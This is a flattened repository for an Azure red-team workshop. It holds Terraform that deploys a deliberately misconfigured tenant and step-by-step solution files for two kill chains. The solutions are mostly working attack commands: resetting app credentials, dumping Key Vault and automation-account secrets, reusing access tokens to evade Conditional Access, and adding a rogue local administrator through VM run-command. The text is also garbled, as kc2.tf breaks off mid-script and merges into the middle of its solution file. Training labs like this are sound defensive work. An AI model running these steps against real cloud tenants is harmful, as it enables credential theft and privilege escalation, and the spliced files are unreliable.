├── LICENSE.txt ├── README.md ├── kc1 ├── kc1.tf └── kc1_solution.txt ├── kc2 ├── id_rsa.pub ├── kc2.tf ├── kc2_solution.txt ├── secret.txt └── super-secret-file.txt └── resources.txt /LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright (C) 2023 Mandiant, Inc. 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Azure Red Team Attack and Detect Workshop 2 | 3 | This is a vulnerable-by-design Azure lab containing 2 x attack paths with common misconfigurations. These vulnerabilities are intended to represent those found in live production environments and the attack vectors are intended to be as realistic as possible to real Threat Actors TTPs. If you would like to see what detections and alerts these attack path vectors are causing, I recommend signing up for a Microsoft E5 trial which has Microsoft Defender for Cloud and Azure AD premium P2 plan. Links for signing up to an Azure Developer account can be found in the resources.txt file. 4 | 5 | Author - Roxana Kovaci (@RoxanaKovaci) 6 | 7 | ## Requirements 8 | - Azure tenant 9 | - Azure CLI 10 | - Terraform version 1.2.2 or above 11 | - Azure User with Global Admin role in the AAD tenant 12 | - add your external IP on lines 248-249 in kc1.tf 13 | 14 | ## Deployment 15 | ``` 16 | az login 17 | git clone https://github.com/mandiant/Azure_Workshop.git 18 | cd Azure_Workshop 19 | cd kc1 20 | 21 | terraform init 22 | terraform validate 23 | 24 | terraform plan -out kc1.tfplan 25 | terraform apply kc1.tfplan 26 | 27 | cd ../kc2 28 | 29 | terraform init 30 | terraform validate 31 | 32 | terraform plan -out kc2.tfplan 33 | terraform apply kc2.tfplan 34 | ``` 35 | 36 | ## Get started 37 | - the entry point for each kill-chain is user1. To get the initial user's credentials, run the following query: 38 | ``` 39 | terraform output 40 | ``` 41 | 42 | ## Kill-Chain objectives and other resources 43 | Kill-Chain #1: 44 | 45 | - Objective: Gain access to the Customers PII data. 46 | 47 | - Solutions: The full attack path solutions can be found in kc1/kc1_solution.txt 48 | 49 | Kill-Chain #2: 50 | 51 | - Objective: Gain access to the super secret file. 52 | 53 | - Solutions: The full attack path solutions can be found in kc2/kc2_solution.txt 54 | 55 | Each kill-chain has in its folder the Terraform script (and other pre-reqs files needed for deployment) and the solutions to the challenges. 56 | 57 | Other resources and useful links to learn more can be found in resources.txt file. 58 | 59 | ## Clean up 60 | After finishing with each kill-chain scenario, you can remove all resources previously added in your tenant: 61 | ``` 62 | az login 63 | 64 | cd kc1 65 | terraform destroy 66 | 67 | cd ../kc2 68 | terraform destroy 69 | ``` 70 | -------------------------------------------------------------------------------- /kc1/kc1.tf: -------------------------------------------------------------------------------- 1 | # Author: Roxana Kovaci 2 | # Twitter: @RoxanaKovaci 3 | 4 | ############################################################################# 5 | # VARIABLES 6 | ############################################################################# 7 | 8 | variable "domain" { 9 | type = string 10 | description = "Domain name (for example: contoso.onmicrosoft.com)" 11 | } 12 | 13 | variable "user_name1" { 14 | type = string 15 | default = "chris.green" 16 | description = "User name" 17 | } 18 | 19 | variable "user_name2" { 20 | type = string 21 | default = "peter.williams" 22 | description = "User name" 23 | } 24 | 25 | variable "user_name3" { 26 | type = string 27 | default = "sqladmin" 28 | description = "User name" 29 | } 30 | 31 | variable "user_password1" { 32 | type = string 33 | description = "Password" 34 | } 35 | 36 | variable "user_password2" { 37 | type = string 38 | description = "Password" 39 | } 40 | 41 | variable "user_password3" { 42 | type = string 43 | description = "Password" 44 | } 45 | 46 | variable "resource_group_name" { 47 | type = string 48 | default = "Innovation" 49 | description = "The name of the Resource Group" 50 | } 51 | 52 | variable "application_name" { 53 | type = string 54 | default = "InnovationApp" 55 | description = "The name of the App Register" 56 | } 57 | 58 | variable "key_vault_name" { 59 | type = string 60 | default = "InnovationTeamKeyVault" 61 | description = "The name of the Key Vault" 62 | } 63 | 64 | variable "automation_account_name" { 65 | type = string 66 | default = "InnovationAutomation" 67 | description = "The name of the Automation Account" 68 | } 69 | 70 | variable "sql_server_name" { 71 | type = string 72 | default = "svrcustomerdb" 73 | description = "The name of the SQL Server" 74 | } 75 | 76 | variable "sql_db_name" { 77 | type = string 78 | default = "CustomerPIIDB" 79 | description = "The name of the SQL DB" 80 | } 81 | 82 | 83 | ############################################################################# 84 | # DATA 85 | ############################################################################# 86 | 87 | data "azurerm_subscription" "current" {} 88 | 89 | data "azurerm_client_config" "current" {} 90 | 91 | ############################################################################# 92 | # PROVIDERS 93 | ############################################################################# 94 | 95 | terraform { 96 | required_providers { 97 | azuread = { 98 | source = "hashicorp/azuread" 99 | version = "2.22.0" 100 | } 101 | } 102 | } 103 | 104 | provider "azuread" { 105 | } 106 | 107 | provider "azurerm" { 108 | features { 109 | key_vault { 110 | purge_soft_delete_on_destroy = true 111 | } 112 | } 113 | } 114 | 115 | ############################################################################# 116 | # RESOURCES 117 | ############################################################################# 118 | 119 | ## Resource Group ## 120 | 121 | resource "azurerm_resource_group" "innovation" { 122 | name = var.resource_group_name 123 | location = "East US" 124 | } 125 | 126 | ## AZURE AD USER ## 127 | 128 | resource "azuread_user" "user1" { 129 | user_principal_name = "${var.user_name1}@${var.domain}" 130 | display_name = var.user_name1 131 | password = var.user_password1 132 | disable_password_expiration = true 133 | } 134 | 135 | resource "azuread_user" "user2" { 136 | user_principal_name = "${var.user_name2}@${var.domain}" 137 | display_name = var.user_name2 138 | password = var.user_password2 139 | disable_password_expiration = true 140 | department = "Linux user" 141 | } 142 | 143 | resource "azuread_user" "user3" { 144 | user_principal_name = "${var.user_name3}@${var.domain}" 145 | display_name = var.user_name3 146 | password = var.user_password3 147 | disable_password_expiration = true 148 | } 149 | 150 | 151 | ## APP / SPN ## 152 | resource "azuread_application" "InnovationApp" { 153 | display_name = var.application_name 154 | } 155 | 156 | resource "azuread_service_principal" "InnovationAppSPN" { 157 | application_id = azuread_application.InnovationApp.application_id 158 | } 159 | 160 | ## Key Vault ## 161 | resource "azurerm_key_vault" "InnovationDeptKeyVault" { 162 | name = var.key_vault_name 163 | location = azurerm_resource_group.innovation.location 164 | resource_group_name = azurerm_resource_group.innovation.name 165 | enabled_for_disk_encryption = true 166 | tenant_id = data.azurerm_client_config.current.tenant_id 167 | soft_delete_retention_days = 7 168 | purge_protection_enabled = false 169 | sku_name = "standard" 170 | 171 | access_policy { 172 | tenant_id = data.azurerm_client_config.current.tenant_id 173 | object_id = data.azurerm_client_config.current.object_id 174 | 175 | key_permissions = [ 176 | "Get", "Backup", "Delete", "List", "Purge", "Recover", "Restore", "Create", 177 | ] 178 | 179 | secret_permissions = [ 180 | "Backup", "Delete", "Get", "List", "Purge", "Recover", "Restore", "Set", 181 | ] 182 | 183 | storage_permissions = [ 184 | "Backup", "Delete", "Get", "List", "Update", "Recover", "Restore", 185 | ] 186 | } 187 | 188 | access_policy { 189 | tenant_id = data.azurerm_client_config.current.tenant_id 190 | object_id = azuread_service_principal.InnovationAppSPN.object_id 191 | key_permissions = [ 192 | "Get", "List", 193 | ] 194 | secret_permissions = [ 195 | "Get", "List", 196 | ] 197 | } 198 | } 199 | 200 | resource "azurerm_key_vault_secret" "ForPW" { 201 | name = "ForPW" 202 | value = "${var.user_password2}" 203 | key_vault_id = azurerm_key_vault.InnovationDeptKeyVault.id 204 | depends_on = [azurerm_key_vault.InnovationDeptKeyVault] 205 | } 206 | 207 | ## Automation Account ## 208 | resource "azurerm_automation_account" "InnovationAutomationAccount" { 209 | name = var.automation_account_name 210 | location = azurerm_resource_group.innovation.location 211 | resource_group_name = azurerm_resource_group.innovation.name 212 | 213 | sku_name = "Basic" 214 | } 215 | 216 | resource "azurerm_automation_credential" "sa" { 217 | name = "sa" 218 | resource_group_name = azurerm_resource_group.innovation.name 219 | automation_account_name = azurerm_automation_account.InnovationAutomationAccount.name 220 | username = "sa@softwaresolutionsdons.com" 221 | password = "gROzIH&L2Zu4Ya" 222 | } 223 | 224 | resource "azurerm_automation_credential" "sqladmin" { 225 | name = "sqladmin" 226 | resource_group_name = azurerm_resource_group.innovation.name 227 | automation_account_name = azurerm_automation_account.InnovationAutomationAccount.name 228 | username = "${var.user_name3}@${var.domain}" 229 | password = "${var.user_password3}" 230 | } 231 | 232 | ## SQL DB ## 233 | resource "azurerm_mssql_server" "AzureSQLServer" { 234 | name = var.sql_server_name 235 | resource_group_name = azurerm_resource_group.innovation.name 236 | location = "East US" 237 | version = "12.0" 238 | administrator_login = "${var.user_name3}@${var.domain}" 239 | administrator_login_password = "${var.user_password3}" 240 | 241 | azuread_administrator { 242 | login_username = "${var.user_name3}" 243 | object_id = azuread_user.user3.id 244 | azuread_authentication_only = true 245 | } 246 | } 247 | 248 | resource "azurerm_mssql_firewall_rule" "SQLFirewallRule" { 249 | name = "AlllowAzureServices" 250 | server_id = azurerm_mssql_server.AzureSQLServer.id 251 | start_ip_address = "X.X.X.X" 252 | end_ip_address = "X.X.X.X" 253 | } 254 | 255 | resource "azurerm_mssql_database" "AzureSQLDB" { 256 | name = var.sql_db_name 257 | server_id = azurerm_mssql_server.AzureSQLServer.id 258 | collation = "SQL_Latin1_General_CP1_CI_AS" 259 | max_size_gb = 1 260 | sku_name = "Basic" 261 | sample_name = "AdventureWorksLT" 262 | } 263 | 264 | ### AZURE ROLE AND ROLE ASSIGNMENT ### 265 | 266 | ## Directory Roles 267 | resource "azuread_directory_role" "appAdmin" { 268 | display_name = "Application administrator" 269 | } 270 | 271 | resource "azuread_directory_role_member" "appAdminMembers" { 272 | role_object_id = azuread_directory_role.appAdmin.object_id 273 | member_object_id = azuread_user.user1.id 274 | } 275 | 276 | ## RBAC Roles 277 | resource "azurerm_role_assignment" "ACKeyVault1" { 278 | scope = azurerm_key_vault.InnovationDeptKeyVault.id 279 | role_definition_name = "Key Vault Reader" 280 | principal_id = azuread_service_principal.InnovationAppSPN.object_id 281 | } 282 | 283 | resource "azurerm_role_assignment" "ACKeyVault2" { 284 | scope = azurerm_key_vault.InnovationDeptKeyVault.id 285 | role_definition_name = "Key Vault Secrets User" 286 | principal_id = azuread_service_principal.InnovationAppSPN.object_id 287 | } 288 | 289 | resource "azurerm_role_assignment" "ACAutomationAccount" { 290 | scope = azurerm_automation_account.InnovationAutomationAccount.id 291 | role_definition_name = "Contributor" 292 | principal_id = azuread_user.user2.id 293 | } 294 | 295 | resource "azurerm_role_assignment" "ACSQLServer" { 296 | scope = azurerm_mssql_server.AzureSQLServer.id 297 | role_definition_name = "Reader" 298 | principal_id = azuread_user.user3.id 299 | } 300 | 301 | ## Conditional Access rules 302 | resource "azuread_conditional_access_policy" "Linux" { 303 | display_name = "Linux Users" 304 | state = "enabled" 305 | 306 | conditions { 307 | client_app_types = ["all"] 308 | 309 | applications { 310 | included_applications = ["All"] 311 | } 312 | 313 | locations { 314 | included_locations = ["All"] 315 | } 316 | 317 | platforms { 318 | included_platforms = ["android", "iOS", "macOS", "windows", "windowsPhone"] 319 | excluded_platforms = ["linux"] 320 | } 321 | 322 | users { 323 | included_users = [azuread_user.user2.id] 324 | } 325 | } 326 | 327 | grant_controls { 328 | operator = "AND" 329 | built_in_controls = ["block"] 330 | } 331 | } 332 | 333 | ## Output 334 | output "username" { 335 | value = "${var.user_name1}@${var.domain}" 336 | } 337 | output "password" { 338 | value = var.user_password1 339 | } 340 | -------------------------------------------------------------------------------- /kc1/kc1_solution.txt: -------------------------------------------------------------------------------- 1 | # Author: Roxana Kovaci 2 | # Twitter: @RoxanaKovaci 3 | 4 | - chris.green has Application Administrator role which means he can add credentials to the InnovationApp 5 | az login -u <\UserName> -p <\Password> --allow-no-subscriptions 6 | az ad app list --query "[].[displayName,appId]" -o table 7 | az ad app credential reset --id <\AppID> 8 | 9 | - login as InnovationApp Service Principle 10 | az login --service-principal -u <\AppID> -p <\Password> -t <\TenantID> --allow-no-subscriptions 11 | 12 | - SP has Key Vault Reader and Key Vault Secrets User RBAC 13 | az keyvault list 14 | az keyvault secret list --vault-name <\KeyVaultName> 15 | 16 | - extract Key Vault secrets 17 | az keyvault secret show --vault-name <\KeyVaultName> --name <\SecretName> 18 | 19 | - ForPW secret -> indicating creds for peter.williams which has contributor access to an automation account (Linux user, has CA rules) 20 | az login -u <\UserName> -p <\Password> 21 | az role assignment list --all --assignee <\UserName> 22 | 23 | - from PW user department field, he's expected to log in from a Linux machine (Conditional Access rules) 24 | - extract access token from Linux machine or using az on Windows (az seems to bypass the application type) 25 | az account get-access-token 26 | 27 | - import the above access token and login on a Windows machine 28 | Connect-AzAccount -AccountId <\UserName> -AccessToken $token 29 | Import-Module .\Get-AzPasswords.ps1 30 | 31 | - extract credentials from the automation account using MicroBurst script 32 | Get-AzPasswords -AutomationAccounts Y -Subscription <\SubscriptionID> -Verbose 33 | 34 | - login as the sqladmin user and list current roles 35 | az login -u <\UserName> -p <\Password> 36 | az role assignment list --all --assignee <\UserName> 37 | 38 | - list SQL server and DB 39 | az sql server list 40 | az sql db list -s <\SQL-SERVER> -g <\ResourceGroup> --output table 41 | az sql db show --name <\DB-NAME> -g <\ResourceGroup> -s <\SQL-SERVER> 42 | 43 | - connect to the MSSQL DB via Azure portal OR Visual Studio OR MS SQL Server Management Studio OR Cloudshell 44 | sqlcmd -S <\SQL-SERVER>.database.windows.net -U <\UserName> -P <\Password> -G 45 | select @@version; 46 | go 47 | 48 | sqlcmd -S <\SQL-SERVER>.database.windows.net -U <\UserName> -P <\Password> -G -d <\DB-NAME> -Q "SELECT TOP 10 * FROM SalesLT.Customer;" 49 | -------------------------------------------------------------------------------- /kc2/id_rsa.pub: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFDzzLLa9/rLtrZfo9ir1rPQGZWChI0+U+4RpdKt8iuwWJnSJODYS4GEICgXc2+MRL9/3Ben5mhWymxdIy1vALi4n8M4UMQ7H9wZSiMNuL/eTZ45m/HxUtLRnHP4AEoZ753R9g4+/yaoYech4GD++VSICVVCpeQqGkQwKgMpDYwYXzj4fr7dvcrezdLEO4BnT/VVqRq4hakHOXkKhUJ/eH44QkqdB2KctdkITl3k4hK3aI/fwMf6WIyF/3NxAt+IqcU/6QKxTz8biE4SVAm21DcPaflf/pg/FMxyrbt2TnZawZ268xLEQuEYvkHw44rDXcBDDMHfgNoyyRYhljVry3 -------------------------------------------------------------------------------- /kc2/kc2.tf: -------------------------------------------------------------------------------- 1 | # Author: Roxana Kovaci 2 | # Twitter: @RoxanaKovaci 3 | 4 | ############################################################################# 5 | # VARIABLES 6 | ############################################################################# 7 | 8 | variable "domain" { 9 | type = string 10 | description = "Domain name (for example: contoso.onmicrosoft.com)" 11 | } 12 | 13 | variable "user_name1" { 14 | type = string 15 | default = "katie.parkson" 16 | description = "User name" 17 | } 18 | 19 | variable "user_password1" { 20 | type = string 21 | description = "Password" 22 | } 23 | 24 | variable "resource_group_name" { 25 | type = string 26 | default = "engineering" 27 | description = "The name of the Resource Group" 28 | } 29 | 30 | variable "linuxvm_name" { 31 | type = string 32 | default = "LinuxVM" 33 | description = "The name of the Linux VM" 34 | } 35 | 36 | variable "windowsvm_name" { 37 | type = string 38 | default = "WindowsVM" 39 | description = "The name of the Windows VM" 40 | } 41 | 42 | variable "virtual_network_name" { 43 | type = string 44 | default = "vNetwork" 45 | description = "The name of the virtual network" 46 | } 47 | 48 | variable "linuxvm_user" { 49 | type = string 50 | default = "azureuser" 51 | description = "The name of the sudo user on Linux VM" 52 | } 53 | 54 | variable "windowsvm_user" { 55 | type = string 56 | default = "helen" 57 | description = "The name of the local admin on the Windows VM" 58 | } 59 | 60 | variable "windowsvm_password" { 61 | type = string 62 | description = "The password of the local admin on the Windows VM" 63 | } 64 | 65 | variable "storage_account_name" { 66 | type = string 67 | default = "datamining01" 68 | description = "The name of the Storage Account" 69 | } 70 | 71 | variable "container_name" { 72 | type = string 73 | default = "investment" 74 | description = "The name of the Storage Container" 75 | } 76 | 77 | variable "share_name" { 78 | type = string 79 | default = "engineering-data" 80 | description = "The name of the Storage File Share" 81 | } 82 | 83 | 84 | ############################################################################# 85 | # DATA 86 | ############################################################################# 87 | 88 | data "azurerm_subscription" "current" {} 89 | 90 | data "azurerm_client_config" "current" {} 91 | 92 | ############################################################################# 93 | # PROVIDERS 94 | ############################################################################# 95 | 96 | provider "azurerm" { 97 | features {} 98 | } 99 | 100 | provider "azuread" { 101 | } 102 | 103 | 104 | ############################################################################# 105 | # RESOURCES 106 | ############################################################################# 107 | 108 | ## Resource Group ## 109 | 110 | resource "azurerm_resource_group" "innovation" { 111 | name = var.resource_group_name 112 | location = "East US" 113 | } 114 | 115 | ## AZURE AD USER ## 116 | 117 | resource "azuread_user" "user1" { 118 | user_principal_name = "${var.user_name1}@${var.domain}" 119 | display_name = var.user_name1 120 | password = var.user_password1 121 | disable_password_expiration = true 122 | } 123 | 124 | ## AZURE STORAGE ACCOUNT ## 125 | resource "azurerm_storage_account" "storage" { 126 | name = var.storage_account_name 127 | resource_group_name = azurerm_resource_group.innovation.name 128 | location = azurerm_resource_group.innovation.location 129 | account_tier = "Standard" 130 | account_replication_type = "LRS" 131 | } 132 | 133 | resource "azurerm_storage_container" "container" { 134 | name = var.container_name 135 | storage_account_name = azurerm_storage_account.storage.name 136 | container_access_type = "private" 137 | } 138 | 139 | resource "azurerm_storage_blob" "container-file" { 140 | name = "secret.txt" 141 | storage_account_name = azurerm_storage_account.storage.name 142 | storage_container_name = azurerm_storage_container.container.name 143 | type = "Block" 144 | source = "./secret.txt" 145 | } 146 | 147 | resource "azurerm_storage_share" "share" { 148 | name = var.share_name 149 | storage_account_name = azurerm_storage_account.storage.name 150 | quota = 50 151 | } 152 | 153 | resource "azurerm_storage_share_file" "share-file" { 154 | name = "super-secret-file.txt" 155 | storage_share_id = azurerm_storage_share.share.id 156 | source = "./super-secret-file.txt" 157 | } 158 | 159 | ## AZURE LINUX VIRTUAL MACHINE ## 160 | resource "azurerm_virtual_network" "vNet" { 161 | name = var.virtual_network_name 162 | address_space = ["10.0.0.0/16"] 163 | location = azurerm_resource_group.innovation.location 164 | resource_group_name = azurerm_resource_group.innovation.name 165 | } 166 | 167 | resource "azurerm_subnet" "internal" { 168 | name = "internal" 169 | resource_group_name = azurerm_resource_group.innovation.name 170 | virtual_network_name = azurerm_virtual_network.vNet.name 171 | address_prefixes = ["10.0.2.0/24"] 172 | } 173 | 174 | resource "azurerm_public_ip" "LinuxVMPublicIP" { 175 | name = "myPublicIP" 176 | location = azurerm_resource_group.innovation.location 177 | resource_group_name = azurerm_resource_group.innovation.name 178 | allocation_method = "Dynamic" 179 | sku = "Basic" 180 | } 181 | 182 | resource "azurerm_network_interface" "External" { 183 | name = "ExternalNIC" 184 | location = azurerm_resource_group.innovation.location 185 | resource_group_name = azurerm_resource_group.innovation.name 186 | 187 | ip_configuration { 188 | name = "external" 189 | subnet_id = azurerm_subnet.internal.id 190 | private_ip_address_allocation = "Dynamic" 191 | public_ip_address_id = azurerm_public_ip.LinuxVMPublicIP.id 192 | } 193 | } 194 | 195 | resource "azurerm_network_security_group" "NSG" { 196 | name = "LinuxVMNSG" 197 | location = azurerm_resource_group.innovation.location 198 | resource_group_name = azurerm_resource_group.innovation.name 199 | } 200 | 201 | resource "azurerm_network_interface_security_group_association" "NSGAssociation" { 202 | network_interface_id = azurerm_network_interface.External.id 203 | network_security_group_id = azurerm_network_security_group.NSG.id 204 | } 205 | 206 | ## AZURE Linux VM ## 207 | resource "azurerm_linux_virtual_machine" "LinuxVM" { 208 | name = var.linuxvm_name 209 | resource_group_name = azurerm_resource_group.innovation.name 210 | location = azurerm_resource_group.innovation.location 211 | size = "Standard_B2s" 212 | admin_username = var.linuxvm_user 213 | network_interface_ids = [azurerm_network_interface.External.id] 214 | 215 | admin_ssh_key { 216 | username = "azureuser" 217 | public_key = file("./id_rsa.pub") 218 | } 219 | 220 | os_disk { 221 | caching = "ReadWrite" 222 | storage_account_type = "Standard_LRS" 223 | } 224 | 225 | source_image_reference { 226 | publisher = "Canonical" 227 | offer = "0001-com-ubuntu-server-focal" 228 | sku = "20_04-lts-gen2" 229 | version = "latest" 230 | } 231 | 232 | identity { 233 | type = "SystemAssigned" 234 | } 235 | } 236 | 237 | resource "azurerm_virtual_machine_extension" "CommandLinux" { 238 | name = "customscript" 239 | virtual_machine_id = azurerm_linux_virtual_machine.LinuxVM.id 240 | publisher = "Microsoft.Azure.Extensions" 241 | type = "CustomScript" 242 | type_handler_version = "2.0" 243 | 244 | settings = < 6 | az storage account list 7 | az storage container list --account-name <\StorageAccountName> --auth-mode login 8 | az storage blob list --container-name <\ContainerName> --account-name <\StorageAccountName> --auth-mode login 9 | az storage blob download --container-name <\ContainerName> --account-name <\StorageAccountName> --name <\BlobName> --file blobsecret.txt --auth-mde login 10 | 11 | - katie.parkson has Owner role on LinuxVMNSG -> can add an SSH firewall rule 12 | - list firewall rules: 13 | az network nsg rule list -g <\ResourceGroup> --nsg-name <\NSGName> --output table 14 | 15 | - create a new inbound NSG rule: 16 | az network nsg rule create -g <\ResourceGroup> --nsg-name <\NSGName> -n MyNsgRule --priority 4096 --source-address-prefixes X.X.X.X/24 --source-port-ranges '*' --destination-address-prefixes '*' --destination-port-ranges 22 --access Allow --protocol Tcp --description "Allow from specific IP address ranges on port 22" 17 | 18 | - katie.parkson has also Reader role on LinuxVMPublicIp -> list IP of the LinuxVM 19 | az network public-ip list -g <\ResourceGroup> 20 | 21 | - get root on LinuxVM with the added firewall rule + SSH private key 22 | ssh -i blobsecret.txt azureuser@<\PublicIp> 23 | 24 | - LinuxVM runs as a Managed Identity with Contributor role on WindowsVM 25 | az login --identity 26 | az vm list -g <\ResourceGroup> --output table 27 | 28 | - LinuxVM can run commands as SYSTEM -> add a local admin on WindowsVM 29 | az vm run-command invoke --command-id RunPowerShellScript --name <\WindowsVM> --resource-group <\ResourceGroup> --scripts 'net user user1 Passw0rd! /add’ 30 | az vm run-command invoke --command-id RunPowerShellScript --name <\WindowsVM> -g <\ResourceGroup> --script "net localgroup Administrators user1 /add" 31 | 32 | - find out 